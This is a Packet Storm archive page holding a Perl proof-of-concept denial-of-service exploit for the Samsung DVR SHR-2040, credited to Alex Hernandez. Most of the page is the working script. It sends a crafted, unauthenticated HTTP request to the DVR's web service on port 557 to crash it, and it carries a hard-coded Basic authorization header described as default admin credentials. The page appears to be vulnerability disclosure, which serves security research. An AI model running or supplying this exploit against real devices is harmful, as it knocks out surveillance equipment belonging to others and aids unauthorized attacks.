what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

samsung-dos.txt

samsung-dos.txt
Posted Sep 5, 2008
Authored by Alex Hernandez

Proof of concept denial of service exploit for the Samsung DVR SHR-2040.

tags | exploit, denial of service, proof of concept
SHA-256 | f173614a1597153ec3b59cabe2a7e09d31c193e2ae9d282668f9b81a1b960b2d

samsung-dos.txt

Change Mirror Download
#!/usr/bin/perl -w
#
# Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC
#
# The vulnerability is caused due to an unspecified error in the cgis
# files filter used for configure propierties. This can be exploited by
# sending a specially crafted HTTP request (NO necessary authentication),
# which will cause the HTTP service on the system to crash.
#
# Requisites: Test default ports:
#
# PORT STATE SERVICE
# 554/tcp open rtsp
# 557/tcp open openvms-sysipc
#
# The vulnerability has been reported in versions Samsung DVR
#
# Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040
#
# More information: https://www.samsung.com
# https://www.sybsecurity.com
#
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.
#
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,
# pikah, codebreak, h3llfyr3, canit0.
#
# Alex Hernandez ahernandez [at] sybsecurity dot com
#

use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;

my $string = "/x"; # Strings to send
my $method = 'GET'; # Method "GET" or "POST"
my $uri = 'https://10.50.10.248:557'; # IP address:port (change this)
my $content = "/test.html"; # Paths to crash

#my $content = "/first.htm";
#my $content = "/content_frame.htm?cgiName=";
#my $content = "/index_menu.htm?lang=en&topMenu=";

my $headers = HTTP::Headers->new(

'Accept:' => '*/*',
'Referer:' => 'https://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@10.50.10.248:557',
'Accept-Language:' => 'en-us,en;q=0.5',
'UA-CPU:' => 'x86',
'Accept-Encoding:' => 'gzip, deflate',
'User-Agent:' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Host:' => '10.50.10.248:557',
'Connection' => 'keep-alive',
'Authorization:' => 'Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==', # base64 encode ADMIN:12345

);

my $request = HTTP::Request->new($method, $uri, $headers, $content, $string);

my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Samsung SHR2040 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from DVR: \n\n" . $response->content . "\n";

my $data;
foreach my $pair (split('&', $response->content)) {
my ($k, $v) = split('=', $pair);
$data->{$k} = $v;
}

if ($data->{RESULT} != 0) {

print "[+] Denial of Service exploit for Samsung SHR2040 Final\n";
print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
print "[+] Use:\n";
print "\tperl -x dos_dvrsamsung.pl\n";
print $data->{RESPMSG} . "\n";
exit(0);

} else {

print "[+] Denial of service Exploit successed!!!\n";
print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";

}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close